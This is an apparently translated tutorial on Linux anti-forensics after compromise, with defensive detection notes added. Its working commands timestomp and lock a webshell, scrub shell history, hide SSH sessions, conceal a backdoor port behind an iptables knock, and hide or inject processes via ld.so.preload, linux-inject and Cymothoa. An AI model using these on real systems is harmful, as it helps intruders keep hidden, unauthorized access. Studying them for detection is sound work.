After obtaining access, an attacker typically uses a handful of tricks to keep files and other traces from being noticed. This section looks at file hiding on Linux.
Create a hidden file on Linux: `touch .test.txt`
`touch` creates an empty file; a leading dot in the name makes it a "hidden" file (a dotfile), as shown in the figure.
The usual directory listing on Linux is `ls -l`, which omits dotfiles and shows only ordinary files and directories. To see hidden files you need `ls -al` (equivalently `ls -la`).
Keep in mind that dotfiles are only hidden from default listings, not from the system: `ls -la`, `find / -name '.*'`, or any file-integrity tool will still find them.
Under `/tmp` several hidden directories exist by default — `/tmp/.ICE-unix/`, `/tmp/.Test-unix/`, `/tmp/.X11-unix/`, `/tmp/.XIM-unix/` — which makes them popular places to stash files; responders should look inside them when triaging a host.
On Unix, a planted backdoor should have its timestamps adjusted, otherwise a file whose times stand out from its neighbours is easy to spot; `touch` is enough for that.
For example, take the timestamp of `index.php` and apply it to `webshell.php`, so both files show the same time. Note that `touch` can only set atime/mtime; the inode change time (ctime) is updated to "now" by the operation itself, so `stat` still reveals the tampering.
Usage:
# Copy index.php's access and modification times onto webshell.php so the two
# files look contemporaneous. Only atime/mtime are copied: ctime cannot be set
# from userspace and is bumped to the current time by this very command, so
# `stat` (or `find -newerct`) still exposes the tampering.
touch -r index.php webshell.php
Or set the time directly to a specific date, e.g. 2 January 2014 (the `-t` argument is `[[CC]YY]MMDDhhmm[.ss]`):
# Set an explicit timestamp: -t takes [[CC]YY]MMDDhhmm[.ss], so 1401021042.30
# is 2014-01-02 10:42:30 local time. As with any touch, ctime is not
# controllable and is updated to the current time regardless.
touch -t 1401021042.30 webshell.php
On Linux, `chattr` sets extended file attributes such as the immutable flag, which is intended to stop even root and other administrators from accidentally deleting or modifying important files and directories. The flag is not shown by `ls -l`, so a file can be protected in a way that ordinary permission checks do not reveal.
This is handy for a backdoor: an administrator who tries to remove the file gets "Operation not permitted" even as root, which can be a real headache — until they think of `lsattr`. Defenders: an immutable flag on an unexpected file (run `lsattr -R` over web roots) is a strong indicator, and clearing it requires `CAP_LINUX_IMMUTABLE`.
- `chattr +i evil.php` — lock the file (set the immutable attribute; it also blocks renaming and appending)
- `lsattr evil.php` — show its attributes
- `chattr -i evil.php` — remove the lock
- `rm -rf 1.evil.php` — delete the file (only possible once the flag is cleared)
Every command run in an interactive shell is written to the shell history. Is there an "incognito mode" on Linux?
Option 1: turn history off for your own session
`[space]set +o history`
Note: `[space]` stands for a leading space. Only if `HISTCONTROL` contains `ignorespace` or `ignoreboth` (Ubuntu's default `.bashrc` sets `ignoreboth`; many other setups do not) are commands beginning with a space left out of the history — then this command itself leaves no trace. If `HISTCONTROL` is unset, the leading space changes nothing and the `set +o history` line is recorded.
With history disabled, nothing run afterwards is added to the history list; everything recorded before remains in the list unchanged.
To re-enable history, run
`[space]set -o history`
which restores the previous state: commands run from then on are recorded again.
This only concerns the shell's own history file. Session recording — auditd `execve` rules, a `PROMPT_COMMAND` logger, syslog-forwarded history, or a recorded terminal — captures commands regardless.
Option 2: delete specific commands from the history list
Suppose the history already contains commands you do not want recorded. What then? Simply delete them:
`history | grep "keyword"`
This prints the matching history entries, each prefixed with its number. Delete a specific entry by number:
`history -d [num]`
Deleting entries one by one is tedious when many are involved. Suppose the first 150 lines are the administrator's own and everything after line 150 was produced by your tooling; then keep only the first 150 lines of the history file:
`sed -i '150,$d' ~/.bash_history`
(the original used the relative path `.bash_history`, which only works when the current directory is the home directory.)
Caveats: `history -d` edits only the in-memory list, and bash writes that list back to `HISTFILE` when the shell exits — so lines you cut from the file with `sed` are re-introduced at logout unless you also run `history -c` or `unset HISTFILE` first. `sed -i` also replaces the file with a new inode, so its ctime changes, which a forensic examiner can notice.
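# Log in without showing up in w/who/last: -T requests no pty, and those
# tools read utmp/wtmp, which sshd only updates for pty sessions. sshd still
# logs the authentication itself (auth.log / journal), so this hides the
# session, not the login event. Without a pty, bash -i has no job control.
ssh -T root@127.0.0.1 /bin/bash -i
# Don't record the server's host key in the *client-side* ~/.ssh/known_hosts.
# Fix: the original had a typographic dash ("–i"), which bash would pass to
# /bin/bash as a filename instead of the -i flag. Note that with
# UserKnownHostsFile=/dev/null ssh still prompts to accept the "unknown" key
# on every connection unless StrictHostKeyChecking=no is also given.
ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i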
Port reuse is a way to hide a listening port: the backdoor service shares a port that is already legitimately open, so a port scan or `ss -lntp` shows nothing new. Two ways to do this on Linux:
Method 1: use SSLH to multiplex SSH and HTTPS on the same port (it demuxes by inspecting the first bytes of each connection).
# Install sslh (Debian/Ubuntu package name).
sudo apt-get install sslh
# Configure SSLH
Edit the SSLH defaults file
# Edit the sslh defaults file. Depending on the packaged version the settings
# may instead live in /etc/sslh.cfg or /etc/sslh/sslh.cfg — check what the
# package actually installed.
sudo vi /etc/default/sslh
1. Find the line `Run=no` and change it to `Run=yes`.
2. Make SSLH listen on port 443 on all interfaces, forwarding SSH to the local sshd and TLS to the web server — which must itself be re-bound to `127.0.0.1:443`, otherwise the two cannot both bind port 443:
# sslh listens on 443 on all interfaces and demuxes by the first bytes of each
# connection: SSH clients go to sshd on 127.0.0.1:22, TLS to 127.0.0.1:443.
# The real web server must therefore be bound to 127.0.0.1:443 only.
# Without --transparent (not set here) the backends see 127.0.0.1 as the
# client address, so web and auth logs lose the real source IP — an artifact
# a defender may notice. Newer sslh versions name the TLS backend --tls;
# --ssl is the older spelling — check `sslh -h`.
DAEMON_OPTS="--user sslh --listen 0.0.0.0:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid"
Method 2: port reuse with iptables — a port-knocking style switch: a magic string sent to port 80 toggles a NAT redirect from port 80 to sshd for the sender's IP. Defenders: `iptables -t nat -S` (or `nft list ruleset`) shows the extra chain, and `/proc/net/xt_recent/letmein` lists the IPs currently "let in". The knock travels in cleartext, so it is trivially sniffable and replayable.
# Port-reuse chain in the nat table: connections that reach it are sent to sshd.
iptables --table nat --new-chain LETMEIN
# Redirect to local port 22.
iptables --table nat --append LETMEIN --protocol tcp --jump REDIRECT --to-port 22
# "Open" knock: any inbound TCP segment whose payload contains the magic string
# adds the sender's IP to the xt_recent list "letmein" (readable at
# /proc/net/xt_recent/letmein). Note the knock rules carry no --dport: once a
# source is listed, its port-80 connections are already redirected to 22 in
# PREROUTING, so a later knock from it arrives here with dport 22 — limiting
# these rules to port 80 would break the close knock.
iptables --append INPUT --protocol tcp --match string --string 'threathuntercoming' --algo bm --match recent --set --name letmein --rsource --jump ACCEPT
# "Close" knock: remove the sender from the list.
iptables --append INPUT --protocol tcp --match string --string 'threathunterleaving' --algo bm --match recent --name letmein --remove --jump ACCEPT
# For one hour after a knock, the first SYN of each port-80 connection from a
# listed source is diverted into LETMEIN (conntrack then NATs the rest of the
# flow). The magic strings are cleartext and replayable by anyone who sees them.
iptables --table nat --append PREROUTING --protocol tcp --destination-port 80 --syn --match recent --rcheck --seconds 3600 --name letmein --rsource --jump LETMEIN
Usage (run from the attacker's host). A service must actually be listening on port 80 on the target: the knock is matched on the data segment of an established TCP connection, so if nothing accepts the connection the string is never transmitted.
# Open: send the knock to port 80 (something must accept the connection there,
# otherwise the payload carrying the string never leaves the client).
socat - tcp:192.168.28.128:80 <<<'threathuntercoming'
# SSH in over port 80, which the NAT rule now redirects to sshd for this IP.
ssh -o Port=80 root@192.168.28.128
# Close: send the leave knock. This connection is itself redirected to sshd,
# which still completes the handshake, so the string match fires as intended.
socat - tcp:192.168.28.128:80 <<<'threathunterleaving'
Attackers also hide their processes from the administrator's process listing. Two approaches:
Method 1: libprocesshider
GitHub: https://github.com/gianlucaborello/libprocesshider
It uses `LD_PRELOAD` (here via the global `/etc/ld.so.preload`) to hook the libc directory-listing calls, so that dynamically linked tools such as `ps` and `top` skip the target process when they enumerate `/proc`. Steps:
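# Fetch and build. The name of the process to hide is compiled into the
# library (upstream's processhider.c defaults to "evil_script.py") — edit it
# before running make if you need another name. Chain the steps so a failed
# clone or build does not go on to install nothing.
git clone https://github.com/gianlucaborello/libprocesshider.git \
  && cd libprocesshider/ && make
# Install the object where the preload entry will point (root required).
cp libprocesshider.so /usr/local/lib/
# Register it globally — but only if the file is really in place, and only
# once. A preload entry whose file is missing makes ld.so print an error at
# every program start, which is the opposite of stealthy; a duplicate line is
# just extra noise in an already suspicious file.
lib=/usr/local/lib/libprocesshider.so
if [ -f "$lib" ] && ! grep -qxF "$lib" /etc/ld.so.preload 2>/dev/null; then
  echo "$lib" >> /etc/ld.so.preload
fi
# Detection notes: a non-empty /etc/ld.so.preload is itself a strong
# indicator; the hook only affects dynamically linked programs (a static
# busybox ps, or unhide's brute mode, still sees the process); and the library
# appears in every process's /proc/<pid>/maps.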
Test: run `evil_script.py` (the name upstream hides by default — confirm against the repository's README if you changed it before building).
Now `top` and `ps` no longer show `evil_script.py`, yet CPU usage is high and no process appears to account for it — a classic symptom a responder should recognise.
Detecting hidden processes on Linux
unhide
A small forensic tool that finds processes and TCP/UDP ports hidden by rootkits, LKMs or similar techniques; it works on Linux, Unix-like and MS Windows systems. Other checks that defeat an LD_PRELOAD-based hider: look for a non-empty `/etc/ld.so.preload`, list `/proc` with a statically linked tool (e.g. a static busybox), compare `/proc` PIDs against `ps` output, or probe PIDs by brute force (`unhide brute`). The preload library is also visible in every process's `/proc/<pid>/maps`.
Download: http://www.unhide-forensics.info/
# Install (RHEL/CentOS package name shown; on Debian/Ubuntu: apt-get install unhide).
sudo yum install unhide
# Usage synopsis, not a literal command: test_list names the technique(s) to
# run — e.g. `unhide proc`, `unhide sys`, `unhide brute`; `unhide -h` lists
# them all. Hidden ports are covered by the companion `unhide-tcp`. Run as
# root so all of /proc is readable.
unhide [options] test_list
Running `unhide proc` (the other modes, such as `sys` and `brute`, are listed by `unhide -h`; `unhide-tcp` covers hidden ports)
detects `evil_script.py`, as shown in the figure.
Method 2: process injection with linux-inject
linux-inject is a tool for injecting a shared object into a running Linux process.
GitHub: https://github.com/gaffe23/linux-inject.git
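# Fetch and build the injector.
git clone https://github.com/gaffe23/linux-inject.git
cd linux-inject && make
# Start the test target in the background so this shell is free to run the
# injector (run in the foreground, as originally written, it keeps the shell
# busy and the inject step never runs). $! keeps the PID for cleanup or for
# injecting by PID instead of by name.
./sample-target &
target_pid=$!
# Inject the sample shared object into the target, selected by name (-n);
# injecting by PID (-p "$target_pid") should also work — check `./inject -h`.
# Injection relies on ptrace, so it needs root or a permissive
# kernel.yama.ptrace_scope (0) plus a same-uid target — verify on the host.
./inject -n sample-target sample-library.so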
Verify that the injection succeeded, as shown in the figure (if the sample library prints on load, the message appears in the target's terminal; the library also shows up in the target's `/proc/<pid>/maps`).
Cymothoa is a stealthy backdoor tool: it injects its shellcode into an already-running process on the target and thereby runs with that process's privileges. Its main advantage is that it creates no new process, so it is harder to notice — though the injected thread and any new listening socket are still visible under `/proc/<pid>/`.
Download: https://sourceforge.net/projects/cymothoa/files/cymothoa-1-beta/
# Download and unpack cymothoa 1-beta. This URL pins one specific SourceForge
# mirror; the project page picks a mirror automatically if this one is gone.
wget https://jaist.dl.sourceforge.net/project/cymothoa/cymothoa-1-beta/cymothoa-1-beta.tar.gz
tar --gzip --extract --verbose --file=cymothoa-1-beta.tar.gz
# Build (an old codebase; it may need fixes on current 64-bit toolchains).
cd cymothoa-1-beta && make
Summary: this article covered Linux tricks for hiding files, hiding attributes with `chattr`, scrubbing shell history, reusing ports, and hiding processes, together with some ways to detect each of them. It is only a starting point — corrections and additions are welcome.